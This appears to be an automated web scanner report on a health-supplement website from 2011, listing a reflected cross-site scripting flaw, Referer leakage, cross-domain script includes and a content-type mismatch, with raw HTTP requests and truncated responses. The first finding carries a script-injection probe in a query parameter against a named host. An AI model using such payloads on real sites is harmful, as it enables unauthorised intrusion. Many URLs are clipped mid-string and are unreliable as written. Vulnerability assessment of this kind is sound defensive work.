1. Cross-site scripting (reflected)
2. Cross-domain Referer leakage
3. Cross-domain script include
4. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://www.thehealth |
Path: | /ac-usap.php |
GET /ac-usap.php?sub=xyp7e765"><script>alert(1)< Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html Date: Thu, 03 Feb 2011 16:04:01 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.5 Connection: keep-alive Content-Length: 48515 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR <!-- saved from url=(0034)http://www <H ...[SNIP]... <A href="http://ziggymedia target=_blank> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thehealth |
Path: | /ac-usap.php |
GET /ac-usap.php?sub=xyp HTTP/1.1 Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html Date: Thu, 03 Feb 2011 16:01:24 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.5 Connection: keep-alive Content-Length: 48085 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR <!-- saved from url=(0034)http://www <H ...[SNIP]... <META name=robots content="noindex, nofollow"><LINK rel=stylesheet type=text/css href="http://static href="images/favicon.ico" ...[SNIP]... <TD height=110> <OBJECT codeBase="http://download classid=clsid:D27CDB6E height=107> ...[SNIP]... <PARAM NAME="wmode" VALUE="opaque"> <embed src="http://static wmode="opaque" pluginspage="http://www type="application/x height="107"> ...[SNIP]... <LI><A href="http://ziggymedia target=_blank> ...[SNIP]... <LI><A href="http://ziggymedia target=_blank> ...[SNIP]... <STRONG><A href="http://ziggymedia target=_blank> ...[SNIP]... <STRONG><A href="http://ziggymedia target=_blank> ...[SNIP]... <P align=left>First get <A href="http://ziggymedia target=_blank> ...[SNIP]... <P align=left>Then get <A href="http://ziggymedia target=_blank> ...[SNIP]... <DIV style="TEXT-ALIGN: center; LINE-HEIGHT: 15px; FONT-FAMILY: arial, helvetica, verdana, sans-serif; FONT-SIZE: 10px"><A style="FONT-SIZE: 10px" href="http://ziggymedia Forecast</A> | <A href="http://ziggymedia Maps</A> | <A href="http://ziggymedia Radar</A> ...[SNIP]... <div style="border:1px solid #000; width:270px; padding:10px;"> <a href="http://us.rd.yahoo (Reuters) </a> ...[SNIP]... <br><a href="http://us.rd.yahoo (Reuters) </a> ...[SNIP]... <br><a href="http://us.rd.yahoo (Reuters) </a> ...[SNIP]... <PARAM NAME="allowscriptaccess" VALUE="always"> <embed src="http://www.youtube type="application/x allowfullscreen="false" width="150" height="120"> ...[SNIP]... <PARAM NAME="allowscriptaccess" VALUE="always"> <embed src="http://www.youtube type="application/x allowfullscreen="true" width="150" height="120"> ...[SNIP]... <CENTER><A href="http://ziggymedia target=_blank> src="acai_files ...[SNIP]... </DIV> <img src="http://adserving <script type="text/javascript" src="http://dnn506yrbagrg ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.thehealth |
Path: | /ac-usap.php |
GET /ac-usap.php?sub=xyp HTTP/1.1 Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.local.com/dart Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html Date: Thu, 03 Feb 2011 16:01:24 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding X-Powered-By: PHP/5.3.2-1ubuntu4.5 Connection: keep-alive Content-Length: 48085 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR <!-- saved from url=(0034)http://www <H ...[SNIP]... <img src="http://adserving <script type="text/javascript" src="http://dnn506yrbagrg ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.thehealth |
Path: | /acai_files/netweath |
GET /acai_files/netweath Host: www.thehealthreport.net Proxy-Connection: keep-alive Referer: http://www.thehealth Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: text/plain Date: Thu, 03 Feb 2011 16:01:28 GMT ETag: "16533-f11-49aa02c542700" Last-Modified: Mon, 24 Jan 2011 23:43:56 GMT Server: Apache/2.2.14 (Ubuntu) Content-Length: 3857 Connection: keep-alive //v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; } function AC_Generateobj(objAttrs, params, e ...[SNIP]... |